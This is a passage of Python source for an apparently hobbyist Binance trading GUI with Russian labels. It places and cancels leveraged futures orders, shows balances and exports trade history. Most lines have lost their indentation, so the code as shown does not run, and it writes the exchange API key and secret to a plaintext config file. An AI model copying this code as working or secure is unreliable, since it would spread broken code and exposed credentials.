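        book = bot.depth(symbol=symbol, limit=limit)
    else:  #__FUTURES (any non-SPOT market type)
        book = bot.futuresDepth(symbol=symbol, limit=limit)
    return book['bids'], book['asks']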
    #______________Timer that waits for all running daemon threads to stop before the program exits
class Timer_End:
def __init__(self):
while True:
if TE_Tck==True and TE_Cnd == True and TE_CndSm == True and TE_BU == True and TE_AB == True and TE_Zm == True and TE_OrdTmr == True:
root.destroy()
break
time.sleep(0.01)
#______________Program shutdown (window close button)
def close_window():
global ep
global should_run_T
global should_run_C
global should_run_S
global should_run_BU
global should_run_AB
global should_run_OT
global should_run_OZ
global PS1
global PS_BU
global PS_AB
global PS_OT
global Ord_Zm
ep=messagebox.askokcancel(title=None, message='Вы действительно хотите выйти из программы?')
if ep==True:
should_run_T=False
PS1 = True
should_run_C=False
should_run_S=False
should_run_BU=False
PS_BU = False
should_run_AB=False
PS_AB = False
should_run_OT=False
PS_OT = False
should_run_OZ=False
Ord_Zm = False
TEPr = threading.Thread(target=Timer_End,daemon=True)
TEPr.start()
#______________BUTTON 1_CLICK BEGIN - Start/Stop TICK/CANDLE GRAPH
def click_button1():
global should_run_T
global should_run_C
global should_run_S
global myFont
global PS1
#print(GS)
myFont = font.Font(size=15)
app.button_1['font'] = myFont
if GS == 'TICK':
if should_run_T == True:
should_run_T = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Включить", fg='green')
else:
PS1 = False
t1 = threading.Thread(target=Timer_Tick,daemon=True)
t1.start()
app.button_1.config(text="Выключить", fg='red')
should_run_T = True
    elif GS == 'CANDLE 1m' or GS == 'CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
if should_run_C == True:
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Включить", fg='green')
else:
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Выключить", fg='red')
should_run_C = True
elif GS == 'CANDLE SUMM':
if should_run_S == True:
should_run_S = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Включить", fg='green')
else:
PS1 = False
timer_3_CSumm = threading.Thread(target=Timer_Candle_Summ,daemon=True)
timer_3_CSumm.start()
app.button_1.config(text="Выключить", fg='red')
should_run_S = True
#______________BUTTON 1_CLICK END - Start/Stop TICK/CANDLE GRAPH
#______________BUTTON 2_CLICK BEGIN - Start/Stop BTC WATCHER
def click_button2():
global PS_BU
global should_run_BU
myFont = font.Font(size=10)
app.button_2['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_BU == True and should_run_BU == True:
PS_BU = False
should_run_BU = False
app.button_2.config(text="Вкл.", fg='green')
elif PS_BU == False and should_run_BU == False:
PS_BU = True
should_run_BU = True
timer_BU = threading.Thread(target=Timer_BTCUSDT,daemon=True)
timer_BU.start()
app.button_2.config(text="Выкл.", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER
#______________BUTTON AB_CLICK BEGIN - Start/Stop ACCOUNT BALANCES WATCHER + FUTURES POSITIONS WATCHER
def click_buttonAB():
global PS_AB
global should_run_AB
myFont = font.Font(size=10)
app.button_AB['font'] = myFont
#print (PS_AB, should_run_AB)
if PS_AB == True and should_run_AB == True:
PS_AB = False
should_run_AB = False
app.button_AB.config(text="Вкл.", fg='green')
elif PS_AB == False and should_run_AB == False:
PS_AB = True
should_run_AB = True
timer_AB = threading.Thread(target=Timer_AccBlns,daemon=True)
timer_AB.start()
app.button_AB.config(text="Выкл.", fg='red')
#______________BUTTON AB_CLICK END - Start/Stop ACCOUNT BALANCES WATCHER + FUTURES POSITIONS WATCHER
#______________BUTTON OrdTmr_CLICK BEGIN - Start/Stop DEPTH TIMER
def click_button_OrdTmr():
global PS_OT
global should_run_OT
myFont = font.Font(size=10)
app.button_OrdTmr['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_OT == True and should_run_OT == True:
PS_OT = False
should_run_OT = False
app.button_OrdTmr.config(text="Вкл. ордера", fg='green')
elif PS_OT == False and should_run_OT == False:
PS_OT = True
should_run_OT = True
timer_OT = threading.Thread(target=Timer_OrdTmr,daemon=True)
timer_OT.start()
app.button_OrdTmr.config(text="Выкл. ордера", fg='red')
#______________BUTTON OrdTmr_CLICK END - Start/Stop DEPTH TIMER
#______________BUTTON Zm_CLICK BEGIN - Start/Stop DEPTH ZOOM
def click_button_Zm():
global Ord_Zm
global should_run_OZ
wh = root.winfo_height()
ww = root.winfo_width()
if Ord_Zm == False:
should_run_OZ = True
Ord_Zm = True
app.graph_Zm.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_2.place_forget()
app.button_Ord.config(text="выкл. Zoom")
timer_Zm = threading.Thread(target=Timer_Zoom,daemon=True)
timer_Zm.start()
else:
should_run_OZ = False
Ord_Zm = False
app.button_Ord.config(text="вкл. Zoom")
app.graph_2.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_Zm.place_forget()
#______________BUTTON Zm_CLICK END - Start/Stop DEPTH ZOOM
#______________BUTTON NwOL_CLICK BEGIN (New Order Long) - SET NEW LONG FUTURES ORDER
def click_buttonNwOL():
    #By default the futures account keeps the position mode set to One-way. To enable the Hedge Mode
    #feature (dual-side positions), call the endpoint POST /fapi/v1/positionSide/dual with dualSidePosition=true.
    #Open position:  Long: positionSide=LONG, side=BUY    Short: positionSide=SHORT, side=SELL
    #Close position: Long: positionSide=LONG, side=SELL   Short: positionSide=SHORT, side=BUY
    #(see the hedge_mode_params sketch after this function)
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f,' ', orLSS)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
#print(k3_s)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='LONG', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
sys_msg = ' Ордер на покупку ' + grSmb + ' в LONG по цене ' + str(k1_f) + ' USDT в количестве ' + str(k3_s) + ' актива установлен.'
sys_msg += ' Маржа ' + str(k2_f) +' USDT, сумма ордера ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Long) - SET NEW LONG FUTURES ORDER
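#__Illustrative sketch (hypothetical helper, not used by the buttons): map an open/close
#__intent in Hedge Mode to the (side, positionSide) pair described in the comment at the
#__top of click_buttonNwOL above.
def hedge_mode_params(position_side, closing=False):
    #__open LONG = BUY/LONG, close LONG = SELL/LONG; open SHORT = SELL/SHORT, close SHORT = BUY/SHORT
    if position_side == 'LONG':
        side = 'SELL' if closing else 'BUY'
    elif position_side == 'SHORT':
        side = 'BUY' if closing else 'SELL'
    else:
        raise ValueError('position_side must be LONG or SHORT')
    return side, position_side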
#______________BUTTON NwOS_CLICK BEGIN (New Order Short) - SET NEW SHORT FUTURES ORDER
def click_buttonNwOS():
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='SHORT', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
            sys_msg = ' Ордер на продажу ' + grSmb + ' в SHORT по цене ' + str(k1_f) + ' USDT в количестве ' + str(k3_s) + ' актива установлен.'
sys_msg += ' Маржа ' + str(k2_f) +' USDT, сумма ордера ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOS_CLICK END (New Order Short) - SET NEW SHORT FUTURES ORDER
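#__Illustrative sketch (hypothetical helper): format an order quantity to the lot step size,
#__reproducing the precision cascade used in click_buttonNwOL and click_buttonNwOS above
#__(step >= 1 -> integer, 0.1 -> 1 decimal place, ... , below 1e-7 -> 8 decimal places).
def fmt_qty_by_step(qty, step):
    step = float(step)
    if step >= 1:
        return str(int(qty))
    decimals = 1
    threshold = 0.1
    while decimals < 8 and step < threshold:
        threshold /= 10.0
        decimals += 1
    return '%.*f' % (decimals, qty)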
#______________BUTTON NwODel_CLICK BEGIN (New Order Delete) - DELETE NEW LONG/SHORT FUTURES ORDER
def click_buttonNwODel():
#print('delete order')
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='LONG':
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер LIMIT удалён [' + grSmb + '], Цена: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='SHORT':
#print(BnFAcc1)
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер LIMIT удалён [' + grSmb + '], Цена: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOShow_CLICK BEGIN (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
def click_buttonNwOShow():
global NwOrSw
if should_run_C == True and MS == 'FUTURES' and NwOrSw==False:
if PosSide == 'LONG':
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)-((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
#print(PosSide)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
if PosSide == 'SHORT':
#print(PosSide)
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)+((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
NwOrSw=True
#print(NwOrSw)
app.button_NwOSw.config(text="Скрыть", fg='red')
elif should_run_C == True and MS == 'FUTURES' and NwOrSw==True:
NwOrSw=False
app.button_NwOSw.config(text="Просмотр", fg='black')
app.graph_Cn.coords(GOS_SL, 0,0,0,0)
app.graph_Cn.coords(GOS_TP, 0,0,0,0)
#______________BUTTON NwOShow_CLICK END (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
#______________BUTTONS END
#______________MENU BEGIN
#______________MENU ACCOUNT_CLICK BEGIN - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
def clicked_Bnacc():
global rootAcc
global app_acc
rootAcc = Tk()
app_acc = AccWn(rootAcc)
rootAcc.title('Binance ключи')
rootAcc.geometry('550x120+150+100')
rootAcc.resizable(width=False, height=False)
rootAcc.mainloop()
#______________MENU ACCOUNT_CLICK END - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
def click_button_AccSave():
global bot
global API_KEY_s
global API_SECRET_s
API_KEY_s = app_acc.text_AK.get(1.0,'end').replace("\n", "")
API_SECRET_s = app_acc.text_AS.get(1.0,'end').replace("\n", "")
if API_KEY_s != '' and API_SECRET_s != '':
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
my_file_Account = open("iTrader.cfg", "w")
sTmp = bot.API_KEY
sTmp += '\n'
sTmp += str(bot.API_SECRET, 'utf-8')
my_file_Account.write(sTmp)
my_file_Account.close()
messagebox.showinfo("Set account KEYs", "Данные успешно сохранены.")
rootAcc.destroy()
#______________MENU ACCOUNT BUTTON SAVE CLICK END - SAVE KEYS
#______________MENU BALANCES_CLICK BEGIN - SHOW NEW WINDOW WITH BALANCES
def clicked_blns():
rootBlns = Tk()
rootBlns.title('Binance balances')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT')
lbl1 = Label(tab1, text='Вкладка 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='FUTURES')
lbl2 = Label(tab2, text='Вкладка 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='MARGIN')
tab_control.pack(expand=1, fill='both')
    #__Populate Tab 1 - SPOT WALLETS
BnAcc = bot.account()
BnAcc1 = BnAcc.get('makerCommission')
sTmp = '\n 1. (makerCommission):' + str(BnAcc1)
BnAcc2 = BnAcc['takerCommission']
sTmp += '\n 2. takerCommission:' + str(BnAcc2)
BnAcc3 = BnAcc['buyerCommission']
sTmp += '\n 3. buyerCommission:' + str(BnAcc3)
BnAcc4 = BnAcc['sellerCommission']
sTmp += '\n 4. sellerCommission:' + str(BnAcc4)
BnAcc5 = BnAcc['canTrade']
sTmp += '\n 5. canTrade:' + str(BnAcc5)
BnAcc6 = BnAcc['canWithdraw']
sTmp += '\n 6. canWithdraw:' + str(BnAcc6)
BnAcc7 = BnAcc['canDeposit']
sTmp += '\n 7. canDeposit:' + str(BnAcc7)
BnAcc8 = BnAcc['updateTime']
sTmp += '\n 8. updateTime:' + str(BnAcc8)
BnAcc9 = BnAcc['accountType']
sTmp += '\n 9. accountType:' + str(BnAcc9)
BnAcc10 = BnAcc['balances']
sTmp += '\n 10. balances_len:' + str(len(BnAcc10))
BnAcc101=BnAcc10[0]
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if float(BnAcc101['free']) > 0 or float(BnAcc101['locked']) > 0:
sTmp += '\n баланс: ' + str(BnAcc101['asset']) + ". Доступно: " + str(BnAcc101['free']) + ". Не доступно: " + str(BnAcc101['locked'])
BnAcc11 = BnAcc['permissions']
sTmp += "\n 11 permissions_len " + str(len(BnAcc11)) + 'permissions:'+ str(BnAcc11)
for mm in range(len(BnAcc11)):
if BnAcc11[mm] == 'SPOT':
sTmp += "\n 11 permissions_SPOT = TRUE (Спотовая торговля)"
if BnAcc11[mm] == 'LEVERAGED':
sTmp += "\n 11 permissions_LEVERAGED = TRUE (Маржинальная торговля?)"
lbl1.config(text = sTmp)
    #__Populate Tab 2 - FUTURES WALLETS
sTmp = ''
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
sTmp += '\n баланс: ' + str(BnFAcc1['asset']) + ". Всего: " + str(BnFAcc1['balance']) + ". Доступно: " + str(BnFAcc1['withdrawAvailable'])
lbl2.config(text = sTmp)
rootBlns.mainloop()
#______________MENU BALANCES_CLICK END - SHOW NEW WINDOW WITH BALANCES
#______________MENU ORDERS_CLICK BEGIN - SHOW NEW WINDOW WITH ORDERS
def clicked_Ordrs():
rootBlns = Tk()
rootBlns.title('Binance orders')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT Сделки')
lbl1 = Label(tab1, text='Вкладка 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='SPOT Ордера')
lbl2 = Label(tab2, text='Вкладка 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='FUTURES Сделки')
lbl3 = Label(tab3, text='Вкладка 3',justify=LEFT)
lbl3.grid(column=0, row=0)
tab_control.pack(expand=1, fill='both')
BnAcc = bot.account()
    #This method returns the trade history of the authorized user for the given pair.
    #Weight - 5.
    #Parameters:
    #Required:
    #symbol - trading pair
    #timestamp - current time (filled in automatically by this code, no need to pass it)
    #Optional:
    #limit - number of trades returned (maximum 500, default 500)
    #fromId - trade id to start the output from. By default the most recent trades are returned.
    #recvWindow - request validity window.
    #(A weekly-paging sketch, collect_weekly_trades, is provided after this menu handler.)
BnMt = bot.myTrades(symbol=grSmb)
#print (len(BnMt))
sTmp = 'BNBUSDT'
if len(BnMt)>0:
for mm in range(len(BnMt)):
BnMtM = BnMt[mm]
sTmp += '\n 1. ' + str(datetime.datetime.fromtimestamp(BnMtM['time']/1000))
if BnMtM['isBuyer'] == True:
sTmp += ' Покупка'
else:
sTmp += ' Продажа'
sTmp += '\n' + 'Цена:' + str(BnMtM['price']) + '. Кол-во:' + str(BnMtM['qty']) + '. Сумма:' + str(BnMtM['quoteQty'])
sTmp += '\n Комиссия:' + str(BnMtM['commissionAsset']) + ": "+ str(BnMtM['commission'])
lbl1.config(text = sTmp)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("%d.%m.%Y %H-%M-%S")
my_file_Trades = open(time_local_str + "_Trades.txt", "w")
my_file_PnL = open(time_local_str + "_PnL.txt", "w")
my_file_Cms = open(time_local_str + "_Cms.txt", "w")
my_file_AllTrades = open(time_local_str + "_AllTds.txt", "w")
BnMt = bot.userTrades(fromId=1,limit=1000)
#print(BnMt[0])
TTT=int((int(time.mktime(time.localtime()))-604800)*1000)
#print(int(time.mktime(time.localtime())))
sTmp = ''
sTmp_PnL = ''
sTmpF=''
sTmpF_PnL=''
sTmp_Cms = ''
sTmpF_Cms = ''
sTmp_AT = ''
sTmpF_AT = ''
while TTT < int(int(time.mktime(time.localtime()))*1000):
BnMt = bot.userTrades(startTime=TTT,limit=1000)
sTmp = ''
sTmp_PnL = ''
sTmp_Cms = ''
sTmp_AT = ''
for i in range(len(BnMt) - 1, -1, -1):
if i > 0 and float(BnMt[i]['realizedPnl']) != 0:
sTmp += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\tid:' + str(BnMt[i]['id']) + '\ts:' + str(BnMt[i]['symbol'])
sTmp += '\t' + str(BnMt[i]['positionSide']) + '\tPNL: ' + str(BnMt[i]['realizedPnl'])
sTmp += '\t\t' + str(BnMt[i]['price']) + ' * ' + str(BnMt[i]['qty']) + ' = ' + str(BnMt[i]['quoteQty'])
sTmp_PnL += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['realizedPnl'])
elif i ==0:
sTmp += ''
if i > 0 and float(BnMt[i]['commission']) > 0:
sTmp_Cms += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['commission']) + '\t' + str(BnMt[i]['commissionAsset'])
if i > 0:
sTmp_AT += '\n' + str(BnMt[i])
sTmpF =sTmp + sTmpF
sTmpF_PnL = sTmp_PnL + sTmpF_PnL
sTmpF_Cms = sTmp_Cms + sTmpF_Cms
sTmpF_AT = sTmp_AT + sTmpF_AT
TTT +=604800000
my_file_Trades.write(sTmpF)
my_file_Trades.close()
my_file_PnL.write(sTmpF_PnL)
my_file_PnL.close()
my_file_Cms.write(sTmpF_Cms)
my_file_Cms.close()
my_file_AllTrades.write(sTmpF_AT)
my_file_AllTrades.close()
lbl3.config(text = sTmp)
rootBlns.mainloop()
#______________MENU ORDERS_CLICK END - SHOW NEW WINDOW WITH ORDERS
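#__Illustrative sketch (hypothetical helper; assumes bot.userTrades accepts startTime in
#__milliseconds and returns at most `limit` records per call): page the futures trade history
#__in 7-day windows (604800000 ms), the same scheme used by the export loop in clicked_Ordrs
#__above, and return all records in a single list.
def collect_weekly_trades(weeks_back=1, limit=1000):
    week_ms = 7 * 24 * 60 * 60 * 1000
    now_ms = int(time.mktime(time.localtime())) * 1000
    start = now_ms - weeks_back * week_ms
    trades = []
    while start < now_ms:
        trades.extend(bot.userTrades(startTime=start, limit=limit))
        start += week_ms
    return trades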
#______________MENU END
#______________ACCOUNT API KEYS WINDOW GUI BEGIN
class AccWn:
def __init__(self, window):
global API_KEY_sT
global API_SECRET_sT
self.label_AK = Label(rootAcc, text="API-Key: ", anchor=NW, justify=LEFT)
self.label_AK.place(height=30,width=70,x=1,y=10)
self.text_AK = Text(rootAcc)
self.text_AK.place(height=20,width=440,x=80,y=10)
self.label_AS = Label(rootAcc, text="API-Secret: ", anchor=NW, justify=LEFT)
self.label_AS.place(height=30,width=70,x=1,y=40)
self.text_AS = Text(rootAcc)
self.text_AS.place(height=20,width=440,x=80,y=40)
self.text_AK.insert(1.0, API_KEY_s)
self.text_AS.insert(1.0, API_SECRET_s)
self.Buttn_Acc_Sv = Button(rootAcc,text="Сохранить",fg='green', command=click_button_AccSave)
self.Buttn_Acc_Sv.place(height=30,width=100,x=10,y=80)
self.Buttn_Acc_Cl = Button(rootAcc,text="Закрыть",fg='black', command=rootAcc.destroy)
self.Buttn_Acc_Cl.place(height=30,width=100,x=440,y=80)
#______________ACCOUNT API KEYS WINDOW GUI END
#______________MAIN WINDOW GUI BEGIN
class gui:
def __init__(self, window):
global OrdSz
global PSDvar
        #__Empty label - just a background
self.label_7 = Label(root, text="Это задний фон!", bg="white")
self.label_7.place(height=10,width=10,x=10,y=10)
#__third label - Graph must be here
self.label_Grpf = Label(root, text="Это график!", bg="lightgreen")
self.label_Grpf.place(height=500,width=510,x=10,y=150)
#__fourth label - Market orders must be here
self.label_Ord = Label(root, text="", bg="lightgreen")
self.label_Ord.place(height=500,width=150,x=410,y=150)
#______________LEFT TOP SIDE START
#__first label - balances, order size
self.label_BlnsSpt = Label(root, text="SPOT баланс = 0 USDT", anchor=NW, justify=LEFT)
self.label_BlnsSpt.place(height=50,width=190,x=10,y=10)
#__second label - search, TP, SL
self.label_2 = Label(root, text="FUTURES баланс = 0 USDT", anchor=NW, justify=LEFT)
self.label_2.place(height=50,width=190,x=10,y=60)
#__Order size
OrdSz = DoubleVar()
OrdSz.set(10)
self.OrdSz_5 = Radiobutton(text="5$", command=lambda i=5: self.OrdSz_Ch(i), variable=OrdSz, value=5,indicatoron=0)
self.OrdSz_10 = Radiobutton(text="10$", command=lambda i=10: self.OrdSz_Ch(i), variable=OrdSz, value=10,indicatoron=0)
self.OrdSz_15 = Radiobutton(text="15$", command=lambda i=15: self.OrdSz_Ch(i), variable=OrdSz, value=15,indicatoron=0)
self.OrdSz_20 = Radiobutton(text="20$", command=lambda i=20: self.OrdSz_Ch(i), variable=OrdSz, value=20,indicatoron=0)
self.OrdSz_25 = Radiobutton(text="25$", command=lambda i=25: self.OrdSz_Ch(i), variable=OrdSz, value=25,indicatoron=0)
self.OrdSz_30 = Radiobutton(text="30$", command=lambda i=30: self.OrdSz_Ch(i), variable=OrdSz, value=30,indicatoron=0)
self.OrdSz_05 = Radiobutton(text="5%", command=lambda i=0.05: self.OrdSz_Ch(i), variable=OrdSz, value=0.05,indicatoron=0)
self.OrdSz_010 = Radiobutton(text="10%", command=lambda i=0.10: self.OrdSz_Ch(i), variable=OrdSz, value=0.10,indicatoron=0)
self.OrdSz_025 = Radiobutton(text="25%", command=lambda i=0.25: self.OrdSz_Ch(i), variable=OrdSz, value=0.25,indicatoron=0)
self.OrdSz_050 = Radiobutton(text="50%", command=lambda i=0.50: self.OrdSz_Ch(i), variable=OrdSz, value=0.50,indicatoron=0)
self.OrdSz_075 = Radiobutton(text="75%", command=lambda i=0.75: self.OrdSz_Ch(i), variable=OrdSz, value=0.75,indicatoron=0)
self.OrdSz_090 = Radiobutton(text="90%", command=lambda i=0.90: self.OrdSz_Ch(i), variable=OrdSz, value=0.90,indicatoron=0)
self.OrdSz_5.place(height=15,width=30,x=10,y=115)
self.OrdSz_10.place(height=15,width=30,x=40,y=115)
self.OrdSz_15.place(height=15,width=30,x=70,y=115)
self.OrdSz_20.place(height=15,width=30,x=100,y=115)
self.OrdSz_25.place(height=15,width=30,x=130,y=115)
self.OrdSz_30.place(height=15,width=30,x=160,y=115)
self.OrdSz_05.place(height=15,width=30,x=10,y=130)
self.OrdSz_010.place(height=15,width=30,x=40,y=130)
self.OrdSz_025.place(height=15,width=30,x=70,y=130)
self.OrdSz_050.place(height=15,width=30,x=100,y=130)
self.OrdSz_075.place(height=15,width=30,x=130,y=130)
self.OrdSz_090.place(height=15,width=30,x=160,y=130)
#_______________LEFT TOP SIDE END
#_______________RIGHT TOP SIDE START
#__Label BTC/USDT watch - grow/fall
self.label_BU = Label(root, text="BTC/USDT +0 %", anchor=NW, justify=LEFT)
self.label_BU.place(height=40,width=200,x=510,y=10)
        #__BTC/USDT watcher start/stop button - start/stop timer
self.button_2 = Button(root, text="ВКЛ", command=click_button2)
self.button_2.place(height=40,width=50,x=460,y=10)
#__Label FUTURES Ords + PnL
self.label_PnL = Label(root, text="FUTURES позиции:\nPnL: +0 %", anchor=NW, justify=LEFT)
self.label_PnL.place(height=60,width=250,x=510,y=60)
#__Account balances start/stop button - start/stop timer
self.button_AB = Button(root, text="ВКЛ.", command=click_buttonAB)
self.button_AB.place(height=60,width=50,x=460,y=60)
#__Label FUTURES Hedge Mode
self.label_HM = Label(root, text="Hedge Mode: ", anchor=NW, justify=LEFT)
self.label_HM.place(height=40,width=250,x=460,y=130)
#_______________RIGHT TOP SIDE END
#_______________MIDDLE TOP SIDE START
self.Tree_Pos=ttk.Treeview(selectmode='none')
self.Tree_Pos['columns']=('Side','Symbol','Leverage','PnL','Price','markPrice','Liquid', 'Qty')
self.Tree_Pos.column("#0",width=0,stretch=NO)
self.Tree_Pos.column("Side",anchor=W,width=80)
self.Tree_Pos.column("Symbol",anchor=W,width=80)
self.Tree_Pos.column("Leverage",anchor=W,width=80)
self.Tree_Pos.column("PnL",anchor=W,width=80)
self.Tree_Pos.column("Price",anchor=W,width=80)
self.Tree_Pos.column("markPrice",anchor=W,width=80)
self.Tree_Pos.column("Liquid",anchor=W,width=80)
self.Tree_Pos.column("Qty",anchor=W,width=80)
self.Tree_Pos.heading("#0",text="",anchor=CENTER)
self.Tree_Pos.heading("Side",text="Позиция",anchor=CENTER)
self.Tree_Pos.heading("Symbol",text="Пара",anchor=CENTER)
self.Tree_Pos.heading("Leverage",text="Плечо",anchor=CENTER)
self.Tree_Pos.heading("PnL",text="PnL",anchor=CENTER)
self.Tree_Pos.heading("Price",text="Цена",anchor=CENTER)
self.Tree_Pos.heading("markPrice",text="МаркЦена",anchor=CENTER)
self.Tree_Pos.heading("Liquid",text="ЦенаЛиквид",anchor=CENTER)
self.Tree_Pos.heading("Qty",text="Кол-во",anchor=CENTER)
self.Tree_Pos.place(height=150,width=300,x=210,y=10)
self.Tree_Pos_VScrl = Scrollbar(root,command=self.Tree_Pos.yview)
self.Tree_Pos_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_Pos.config(yscrollcommand=self.Tree_Pos_VScrl.set)
#_______________MIDDLE TOP SIDE END
#_______________RIGHT SIDE START
